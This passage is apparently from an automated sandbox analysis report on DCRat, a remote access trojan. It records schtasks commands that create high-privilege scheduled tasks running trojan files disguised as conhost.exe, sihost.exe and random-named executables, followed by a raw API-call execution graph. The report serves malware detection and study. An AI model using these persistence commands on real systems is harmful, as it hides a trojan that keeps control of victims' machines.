                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:23
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:24
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\user\SendTo\sihost.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:25
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:26
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:27
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:28
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:29
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:30
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:31
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:32
                                Start time:14:07:17
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:34
                                Start time:14:07:18
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:35
                                Start time:14:07:18
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:36
                                Start time:14:07:18
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:37
                                Start time:14:07:18
                                Start date:11/06/2024
                                Path:C:\Program Files (x86)\jDownloader\config\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\jdownloader\config\conhost.exe"
                                Imagebase:0x950000
                                File size:3'549'696 bytes
                                MD5 hash:7EC6BC11E4B2E409845E3160EC47F5D7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1976381139.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 88%, ReversingLabs
                                Has exited:true

                                Target ID:38
                                Start time:14:07:18
                                Start date:11/06/2024
                                Path:C:\Program Files (x86)\jDownloader\config\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\jdownloader\config\conhost.exe"
                                Imagebase:0x30000
                                File size:3'549'696 bytes
                                MD5 hash:7EC6BC11E4B2E409845E3160EC47F5D7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.1958522017.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:true

                                Target ID:39
                                Start time:14:07:18
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:40
                                Start time:14:07:18
                                Start date:11/06/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:41
                                Start time:14:07:19
                                Start date:11/06/2024
                                Path:C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                                Imagebase:0x180000
                                File size:3'549'696 bytes
                                MD5 hash:7EC6BC11E4B2E409845E3160EC47F5D7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.1997852879.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.1997852879.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 88%, ReversingLabs
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:14.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:30.9%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:31
                                  execution_graph 20500 7ff7c01a653c 20523 7ff7c01a5fc4 20500->20523 20503 7ff7c01a6688 20638 7ff7c01a6940 7 API calls 2 library calls 20503->20638 20504 7ff7c01a6558 __scrt_acquire_startup_lock 20506 7ff7c01a6692 20504->20506 20509 7ff7c01a6576 __scrt_release_startup_lock 20504->20509 20639 7ff7c01a6940 7 API calls 2 library calls 20506->20639 20508 7ff7c01a659b 20509->20508 20511 7ff7c01a6621 20509->20511 20635 7ff7c01af530 35 API calls __GSHandlerCheck_EH 20509->20635 20510 7ff7c01a669d abort 20531 7ff7c01a6a8c 20511->20531 20513 7ff7c01a6626 20534 7ff7c01b0200 20513->20534 20520 7ff7c01a6649 20520->20510 20637 7ff7c01a6158 7 API calls __scrt_initialize_crt 20520->20637 20522 7ff7c01a6660 20522->20508 20640 7ff7c01a6780 20523->20640 20526 7ff7c01a5ff3 20642 7ff7c01b0130 20526->20642 20529 7ff7c01a5fef 20529->20503 20529->20504 20659 7ff7c01a74c0 20531->20659 20661 7ff7c01b3bc0 20534->20661 20536 7ff7c01b020f 20537 7ff7c01a662e 20536->20537 20665 7ff7c01b3f50 35 API calls swprintf 20536->20665 20539 7ff7c01a400c 20537->20539 20540 7ff7c01a4046 20539->20540 20667 7ff7c0187a28 GetCurrentDirectoryW 20540->20667 20542 7ff7c01a4052 20677 7ff7c019d0a8 20542->20677 20544 7ff7c01a405c memcpy_s 20682 7ff7c019d724 20544->20682 20546 7ff7c01a4694 20549 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20546->20549 20547 7ff7c01a40d1 20547->20546 20548 7ff7c01a4226 GetCommandLineW 20547->20548 20551 7ff7c01a43fa 20548->20551 20552 7ff7c01a4238 20548->20552 20550 7ff7c01a469a 20549->20550 20807 7ff7c01aae94 20550->20807 20733 7ff7c0187c10 20551->20733 20692 7ff7c01812bc 20552->20692 20554 7ff7c01a4409 20557 7ff7c0181b70 31 API calls 20554->20557 20561 7ff7c01a4420 BuildCatchObjectHelperInternal 20554->20561 20557->20561 20559 7ff7c01a425d 20702 7ff7c01a0620 20559->20702 20745 7ff7c0181b70 20561->20745 20562 7ff7c01a444b SetEnvironmentVariableW GetLocalTime 20750 7ff7c01861e8 20562->20750 20566 7ff7c01a4267 20566->20550 20569 7ff7c01a42b1 OpenFileMappingW 20566->20569 20570 7ff7c01a4393 20566->20570 20572 7ff7c01a42d1 MapViewOfFile 20569->20572 20573 7ff7c01a4388 CloseHandle 20569->20573 20578 7ff7c01812bc 33 API calls 20570->20578 20572->20573 20575 7ff7c01a42f7 UnmapViewOfFile MapViewOfFile 20572->20575 20573->20551 20575->20573 20579 7ff7c01a4329 20575->20579 20583 7ff7c01a43b8 20578->20583 20812 7ff7c019dd08 33 API calls 2 library calls 20579->20812 20581 7ff7c01a452d 20778 7ff7c019a430 20581->20778 20720 7ff7c01a3810 20583->20720 20590 7ff7c01a4339 20594 7ff7c01a3810 35 API calls 20590->20594 20591 7ff7c019a430 4 API calls 20595 7ff7c01a453f DialogBoxParamW 20591->20595 20597 7ff7c01a4348 20594->20597 20606 7ff7c01a458b 20595->20606 20813 7ff7c018bd30 131 API calls 20597->20813 20601 7ff7c01a468f 20603 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20601->20603 20602 7ff7c01a435d 20814 7ff7c018be7c 131 API calls shared_ptr 20602->20814 20603->20546 20609 7ff7c01a45a4 20606->20609 20610 7ff7c01a459e Sleep 20606->20610 20608 7ff7c01a4370 20613 7ff7c01a437f UnmapViewOfFile 20608->20613 20614 7ff7c01a45b2 shared_ptr 20609->20614 20781 7ff7c019dac4 20609->20781 20610->20609 20613->20573 20618 7ff7c01a45be DeleteObject 20614->20618 20620 7ff7c01a45d7 DeleteObject 20618->20620 20621 7ff7c01a45dd 20618->20621 20620->20621 20623 7ff7c01a4613 20621->20623 20630 7ff7c01a4625 20621->20630 20815 7ff7c01a3928 20623->20815 20821 7ff7c01a5c30 20630->20821 20635->20511 20636 7ff7c01a6ad0 GetModuleHandleW 20636->20520 20637->20522 20638->20506 20639->20510 20641 7ff7c01a5fe6 __scrt_dllmain_crt_thread_attach 20640->20641 20641->20526 20641->20529 20643 7ff7c01b41dc 20642->20643 20644 7ff7c01a5ff8 20643->20644 20647 7ff7c01b2110 20643->20647 20644->20529 20646 7ff7c01a83e0 7 API calls 2 library calls 20644->20646 20646->20529 20658 7ff7c01b2828 EnterCriticalSection 20647->20658 20660 7ff7c01a6aa3 GetStartupInfoW 20659->20660 20660->20513 20662 7ff7c01b3bd9 20661->20662 20663 7ff7c01b3bcd 20661->20663 20662->20536 20666 7ff7c01b3a00 48 API calls 5 library calls 20663->20666 20665->20536 20666->20662 20668 7ff7c0187a4c 20667->20668 20674 7ff7c0187ad9 20667->20674 20830 7ff7c01813c4 20668->20830 20671 7ff7c0187a8d 20838 7ff7c0181c80 20671->20838 20673 7ff7c0187a9b 20673->20674 20675 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20673->20675 20674->20542 20676 7ff7c0187af5 20675->20676 20845 7ff7c018dc4c 20677->20845 20679 7ff7c019d0bd OleInitialize 20680 7ff7c019d0e3 20679->20680 20681 7ff7c019d109 SHGetMalloc 20680->20681 20681->20544 20683 7ff7c019d759 20682->20683 20685 7ff7c019d75e BuildCatchObjectHelperInternal 20682->20685 20684 7ff7c0181b70 31 API calls 20683->20684 20684->20685 20686 7ff7c0181b70 31 API calls 20685->20686 20688 7ff7c019d78d BuildCatchObjectHelperInternal 20685->20688 20686->20688 20687 7ff7c0181b70 31 API calls 20689 7ff7c019d7bc BuildCatchObjectHelperInternal 20687->20689 20688->20687 20688->20689 20690 7ff7c0181b70 31 API calls 20689->20690 20691 7ff7c019d7eb BuildCatchObjectHelperInternal 20689->20691 20690->20691 20691->20547 20693 7ff7c01813bb 20692->20693 20694 7ff7c01812f0 20692->20694 21281 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 20693->21281 20697 7ff7c01812fe BuildCatchObjectHelperInternal 20694->20697 20698 7ff7c0181358 20694->20698 20699 7ff7c01813b6 20694->20699 20697->20559 20698->20697 20701 7ff7c01a5ae0 4 API calls 20698->20701 21280 7ff7c0181b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 20699->21280 20701->20697 20703 7ff7c018cf98 33 API calls 20702->20703 20719 7ff7c01a066f BuildCatchObjectHelperInternal 20703->20719 20704 7ff7c01a090e 20706 7ff7c01a5c30 _handle_error 8 API calls 20704->20706 20705 7ff7c01a08db 20705->20704 20709 7ff7c01a0934 20705->20709 20707 7ff7c01a091f 20706->20707 20707->20566 20708 7ff7c018cf98 33 API calls 20708->20719 20710 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20709->20710 20711 7ff7c01a0939 20710->20711 21283 7ff7c018353c 47 API calls 20711->21283 20712 7ff7c01a093f 21284 7ff7c018353c 47 API calls 20712->21284 20717 7ff7c0181b70 31 API calls 20717->20719 20718 7ff7c01812bc 33 API calls 20718->20719 20719->20705 20719->20708 20719->20709 20719->20711 20719->20712 20719->20717 20719->20718 21282 7ff7c018be7c 131 API calls shared_ptr 20719->21282 20721 7ff7c01a3840 SetEnvironmentVariableW 20720->20721 20722 7ff7c01a383d 20720->20722 20723 7ff7c018cf98 33 API calls 20721->20723 20722->20721 20726 7ff7c01a3878 20723->20726 20724 7ff7c01a38c7 20725 7ff7c01a38fe 20724->20725 20729 7ff7c01a391f 20724->20729 20727 7ff7c01a5c30 _handle_error 8 API calls 20725->20727 20726->20724 20732 7ff7c01a38b1 SetEnvironmentVariableW 20726->20732 20728 7ff7c01a390f 20727->20728 20728->20551 20728->20601 20730 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20729->20730 20731 7ff7c01a3924 20730->20731 20732->20724 20734 7ff7c01813c4 33 API calls 20733->20734 20735 7ff7c0187c45 20734->20735 20736 7ff7c0187c48 GetModuleFileNameW 20735->20736 20739 7ff7c0187c98 20735->20739 20737 7ff7c0187c9a 20736->20737 20738 7ff7c0187c63 20736->20738 20737->20739 20738->20735 20740 7ff7c01812bc 33 API calls 20739->20740 20742 7ff7c0187cc2 20740->20742 20741 7ff7c0187cfa 20741->20554 20742->20741 20743 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20742->20743 20744 7ff7c0187d1c 20743->20744 20746 7ff7c0181bac 20745->20746 20747 7ff7c0181b83 20745->20747 20746->20562 20747->20746 20748 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20747->20748 20749 7ff7c0181bd0 20748->20749 20751 7ff7c018620d swprintf 20750->20751 20752 7ff7c01ad348 swprintf 46 API calls 20751->20752 20753 7ff7c0186229 SetEnvironmentVariableW GetModuleHandleW LoadIconW 20752->20753 20754 7ff7c019eb64 LoadBitmapW 20753->20754 20755 7ff7c019eb96 20754->20755 20756 7ff7c019eb8e 20754->20756 20757 7ff7c019ebb3 20755->20757 20758 7ff7c019eb9e GetObjectW 20755->20758 21285 7ff7c019c260 FindResourceW 20756->21285 21297 7ff7c019c12c 20757->21297 20758->20757 20762 7ff7c019ec1e 20773 7ff7c0189cac 20762->20773 20763 7ff7c019ebee 21302 7ff7c019c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 20763->21302 20764 7ff7c019c260 9 API calls 20766 7ff7c019ebda 20764->20766 20766->20763 20768 7ff7c019ebe2 DeleteObject 20766->20768 20767 7ff7c019ebf7 21303 7ff7c019c15c 20767->21303 20768->20763 20772 7ff7c019ec0f DeleteObject 20772->20762 21310 7ff7c0189cdc 20773->21310 20775 7ff7c0189cba 21377 7ff7c018a83c GetModuleHandleW FindResourceW 20775->21377 20777 7ff7c0189cc2 20777->20581 20779 7ff7c01a5ae0 4 API calls 20778->20779 20780 7ff7c019a476 20779->20780 20780->20591 20782 7ff7c019db0a 20781->20782 20783 7ff7c019db76 20781->20783 20785 7ff7c01812bc 33 API calls 20782->20785 20784 7ff7c0181b70 31 API calls 20783->20784 20789 7ff7c019db91 20783->20789 20784->20789 20786 7ff7c019db34 20785->20786 20790 7ff7c0188b28 47 API calls 20786->20790 20787 7ff7c019dcce 20791 7ff7c01a5c30 _handle_error 8 API calls 20787->20791 20789->20787 20793 7ff7c019dd01 20789->20793 21459 7ff7c0188cf8 20789->21459 20794 7ff7c019db48 20790->20794 20795 7ff7c019dcdf 20791->20795 20792 7ff7c019dbec 20796 7ff7c0182314 33 API calls 20792->20796 20797 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20793->20797 21462 7ff7c0190ad0 CompareStringW 20794->21462 20795->20614 20799 7ff7c019dc1b 20796->20799 20800 7ff7c019dd07 20797->20800 20801 7ff7c019dc26 20799->20801 21463 7ff7c0181734 33 API calls 4 library calls 20799->21463 20802 7ff7c019dc55 SHFileOperationW 20801->20802 20802->20787 20804 7ff7c019dca1 20802->20804 20804->20787 20805 7ff7c019dcfc 20804->20805 20806 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20805->20806 20806->20793 21464 7ff7c01aadcc 31 API calls 2 library calls 20807->21464 20809 7ff7c01aaead 21465 7ff7c01aaec4 16 API calls abort 20809->21465 20812->20590 20813->20602 20814->20608 20816 7ff7c01a397b WaitForSingleObject 20815->20816 20817 7ff7c01a3933 PeekMessageW 20816->20817 20818 7ff7c01a398d CloseHandle 20816->20818 20819 7ff7c01a394f GetMessageW TranslateMessage DispatchMessageW 20817->20819 20820 7ff7c01a3978 20817->20820 20818->20630 20819->20820 20820->20816 20822 7ff7c01a5c39 20821->20822 20823 7ff7c01a4672 20822->20823 20824 7ff7c01a5d20 IsProcessorFeaturePresent 20822->20824 20823->20636 20825 7ff7c01a5d38 20824->20825 21466 7ff7c01a5f14 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 20825->21466 20827 7ff7c01a5d4b 21467 7ff7c01a5ce0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20827->21467 20831 7ff7c01813cd 20830->20831 20832 7ff7c018144d GetCurrentDirectoryW 20830->20832 20833 7ff7c018145d 20831->20833 20836 7ff7c01813ee memcpy_s 20831->20836 20832->20671 20843 7ff7c0181be8 33 API calls std::_Xinvalid_argument 20833->20843 20842 7ff7c018196c 31 API calls _invalid_parameter_noinfo_noreturn 20836->20842 20839 7ff7c0181cc6 20838->20839 20841 7ff7c0181c9b BuildCatchObjectHelperInternal 20838->20841 20844 7ff7c0181464 33 API calls 3 library calls 20839->20844 20841->20673 20842->20832 20844->20841 20846 7ff7c01813c4 33 API calls 20845->20846 20847 7ff7c018dc94 GetSystemDirectoryW 20846->20847 20848 7ff7c018dcb9 20847->20848 20866 7ff7c018dcb2 20847->20866 20851 7ff7c01812bc 33 API calls 20848->20851 20849 7ff7c018de4c 20850 7ff7c01a5c30 _handle_error 8 API calls 20849->20850 20853 7ff7c018de60 20850->20853 20854 7ff7c018dcf1 20851->20854 20852 7ff7c018de79 20855 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20852->20855 20853->20679 20857 7ff7c01812bc 33 API calls 20854->20857 20856 7ff7c018de7e 20855->20856 20859 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20856->20859 20858 7ff7c018dd19 20857->20858 20954 7ff7c01888f8 20858->20954 20860 7ff7c018de84 20859->20860 20862 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20860->20862 20863 7ff7c018de8a 20862->20863 20867 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20863->20867 20864 7ff7c018ddb5 LoadLibraryW 20864->20866 20865 7ff7c018dd2b 20865->20856 20865->20860 20865->20864 20866->20849 20866->20852 20866->20863 20868 7ff7c018de90 _snwprintf 20867->20868 20869 7ff7c018deb8 GetModuleHandleW 20868->20869 20870 7ff7c018df3f 20869->20870 20871 7ff7c018deea GetProcAddress 20869->20871 20872 7ff7c018e3c7 20870->20872 21001 7ff7c01aec3c 39 API calls 2 library calls 20870->21001 20873 7ff7c018deff 20871->20873 20874 7ff7c018df17 GetProcAddress 20871->20874 20876 7ff7c0187c10 34 API calls 20872->20876 20873->20874 20874->20870 20877 7ff7c018df2c 20874->20877 20879 7ff7c018e3d0 20876->20879 20877->20870 20878 7ff7c018e274 20878->20872 20880 7ff7c018e27e 20878->20880 20970 7ff7c0188b28 20879->20970 20882 7ff7c0187c10 34 API calls 20880->20882 20883 7ff7c018e287 CreateFileW 20882->20883 20885 7ff7c018e3b4 CloseHandle 20883->20885 20886 7ff7c018e2c7 SetFilePointer 20883->20886 20888 7ff7c0181b70 31 API calls 20885->20888 20886->20885 20887 7ff7c018e2e0 ReadFile 20886->20887 20887->20885 20889 7ff7c018e308 20887->20889 20888->20872 20891 7ff7c018e6c4 20889->20891 20892 7ff7c018e31c 20889->20892 20890 7ff7c018dc4c 77 API calls 20910 7ff7c018e3de 20890->20910 21020 7ff7c01a5df4 8 API calls 20891->21020 20896 7ff7c01812bc 33 API calls 20892->20896 20894 7ff7c018e402 CompareStringW 20894->20910 20895 7ff7c01812bc 33 API calls 20895->20910 20901 7ff7c018e353 20896->20901 20897 7ff7c018e490 20919 7ff7c01812bc 33 API calls 20897->20919 20927 7ff7c0188dc4 47 API calls 20897->20927 20934 7ff7c0181b70 31 API calls 20897->20934 20940 7ff7c0185890 51 API calls 20897->20940 20944 7ff7c018e4fe 20897->20944 20900 7ff7c0181b70 31 API calls 20900->20910 20905 7ff7c018e39f 20901->20905 20911 7ff7c018dc4c 77 API calls 20901->20911 21002 7ff7c018cf98 20901->21002 20902 7ff7c018e686 20909 7ff7c0181b70 31 API calls 20902->20909 20903 7ff7c018e50c 21006 7ff7c0188be4 47 API calls 20903->21006 20912 7ff7c0181b70 31 API calls 20905->20912 20906 7ff7c018e6ef 20915 7ff7c018e709 SetThreadExecutionState 20906->20915 21022 7ff7c0183b84 RtlPcToFileHeader RaiseException _com_raise_error 20906->21022 20907 7ff7c018e6c9 20907->20906 21021 7ff7c0183b84 RtlPcToFileHeader RaiseException _com_raise_error 20907->21021 20916 7ff7c018e68f 20909->20916 20910->20890 20910->20894 20910->20895 20910->20897 20910->20900 20978 7ff7c0186768 20910->20978 20983 7ff7c0188dc4 20910->20983 20987 7ff7c0185890 20910->20987 20911->20901 20917 7ff7c018e3a9 20912->20917 20914 7ff7c018e515 20918 7ff7c0186768 9 API calls 20914->20918 20921 7ff7c0181b70 31 API calls 20916->20921 20922 7ff7c0181b70 31 API calls 20917->20922 20923 7ff7c018e51a 20918->20923 20919->20897 20924 7ff7c018e699 20921->20924 20922->20885 20925 7ff7c018e525 20923->20925 20926 7ff7c018e5ca 20923->20926 20928 7ff7c01a5c30 _handle_error 8 API calls 20924->20928 20929 7ff7c018dc4c 77 API calls 20925->20929 20930 7ff7c018da04 48 API calls 20926->20930 20927->20897 20931 7ff7c018e6a8 20928->20931 20932 7ff7c018e531 20929->20932 20933 7ff7c018e60f AllocConsole 20930->20933 20931->20679 20937 7ff7c018dc4c 77 API calls 20932->20937 20935 7ff7c018e5bf 20933->20935 20936 7ff7c018e619 GetCurrentProcessId AttachConsole 20933->20936 20934->20897 21019 7ff7c01819d0 31 API calls _invalid_parameter_noinfo_noreturn 20935->21019 20939 7ff7c018e630 20936->20939 20938 7ff7c018e53d 20937->20938 21007 7ff7c018aee0 20938->21007 20947 7ff7c018e63c GetStdHandle WriteConsoleW Sleep FreeConsole 20939->20947 20940->20897 20944->20902 20944->20903 20945 7ff7c018e67d ExitProcess 20947->20935 20949 7ff7c018aee0 48 API calls 20950 7ff7c018e592 20949->20950 21017 7ff7c018db98 33 API calls 20950->21017 20952 7ff7c018e59e 21018 7ff7c01819d0 31 API calls _invalid_parameter_noinfo_noreturn 20952->21018 20955 7ff7c0188936 20954->20955 21023 7ff7c0182314 20955->21023 20957 7ff7c0188987 21033 7ff7c0181c04 20957->21033 20958 7ff7c0188946 20958->20957 21037 7ff7c0181734 33 API calls 